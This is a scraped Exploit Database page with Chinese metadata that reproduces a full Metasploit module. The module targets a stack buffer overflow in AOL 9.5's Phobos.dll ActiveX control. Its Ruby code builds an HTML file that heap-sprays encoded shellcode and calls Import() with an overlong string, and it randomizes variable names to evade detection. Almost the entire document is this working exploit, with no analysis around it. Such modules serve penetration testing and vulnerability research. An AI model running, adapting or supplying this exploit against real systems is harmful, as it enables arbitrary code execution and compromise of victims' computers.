AOL 9.5 – ‘Phobos.Playlist Import()’ Stack Buffer Overflow (Metasploit)

• Exploit Database
• 109 阅读

• 作者： Metasploit
  日期： 2010-09-25
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16651/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141

  ## # $Id: aol_phobos_bof.rb 10477 2010-09-25 11:59:02Z mc $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   ## # aol_phobos_bof.rb # # AOL 9.5 Phobos.Playlist &apos;Import()&apos; Stack-based Buffer Overflow exploit for the Metasploit Framework # # Tested successfully on the following platforms: #- AOL 9.5 (Revision 4337.155) on Internet Explorer 7, Windows XP SP3 # # Phobos.dll version tested: # File Version: 9.5.0.1 # ClassID: A105BD70-BF56-4D10-BC91-41C88321F47C # RegKey Safe for Script: False # RegKey Safe for Init: False # Implements IObjectSafety: False # KillBitSet: False # # Due to the safe for initialization and safe for scripting settings of this ActiveX control, # exploitation is possible only from Local Machine Zone, which means the victim must run the # generated exploit file locally. # # Trancer # http://www.rec-sec.com ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking   include Msf::Exploit::FILEFORMAT   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5. By setting an overly long value to &apos;Import()&apos;, an attacker can overrun a buffer and execute arbitrary code.   NOTE: This ActiveX control is NOT marked safe for scripting or initialization. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Trancer <mtrancer[at]gmail.com>&apos; ], &apos;Version&apos;=> &apos;$Revision: 10477 $&apos;, &apos;References&apos; => [ [ &apos;OSVDB&apos;, &apos;61964&apos;], [ &apos;URL&apos;, &apos;http://www.exploit-db.com/exploits/11204&apos; ], [ &apos;URL&apos;, &apos;http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/&apos; ], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, &apos;DisablePayloadHandler&apos; => &apos;true&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos; => 1024, &apos;BadChars&apos;=> "\x00\x09\x0a\x0d&apos;\\", &apos;StackAdjustment&apos; => -3500, }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0&apos;, { &apos;Ret&apos; => 0x0C0C0C0C, &apos;Offset&apos; => 1000 } ] ], &apos;DisclosureDate&apos; => &apos;Jan 20 2010&apos;, &apos;DefaultTarget&apos;=> 0))   register_options( [ OptString.new(&apos;FILENAME&apos;, [ false, &apos;The file name.&apos;,&apos;msf.html&apos;]), ], self.class) end   def exploit   # Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))   # Setup exploit buffers nops = Rex::Text.to_unescape([target.ret].pack(&apos;V&apos;)) ret = Rex::Text.uri_encode([target.ret].pack(&apos;L&apos;)) blocksize = 0x40000 fillto= 500 offset = target[&apos;Offset&apos;]   # Randomize the javascript variable names phobos = rand_text_alpha(rand(100) + 1) j_shellcode= rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_ret= rand_text_alpha(rand(100) + 1) j_headersize = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock= rand_text_alpha(rand(100) + 1) j_block= rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter= rand_text_alpha(rand(30) + 2) j_bla= rand_text_alpha(rand(8) + 4)   html = %Q|<html> <object classid=&apos;clsid:A105BD70-BF56-4D10-BC91-41C88321F47C&apos; id=&apos;#{phobos}&apos;></object> <script> #{j_shellcode}=unescape(&apos;#{shellcode}&apos;); #{j_nops}=unescape(&apos;#{nops}&apos;); #{j_headersize}=20; #{j_slackspace}=#{j_headersize}+#{j_shellcode}.length; while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops}; #{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace}); #{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace}); while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock}; #{j_memory}=new Array(); for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};   var #{j_ret}=&apos;&apos;; for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape(&apos;#{ret}&apos;); #{phobos}.Import(#{j_ret},&apos;#{j_bla}&apos;,&apos;True&apos;,&apos;True&apos;); </script> </html>|   print_status("Creating &apos;#{datastore[&apos;FILENAME&apos;]}&apos; file ...")   file_create(html) end   end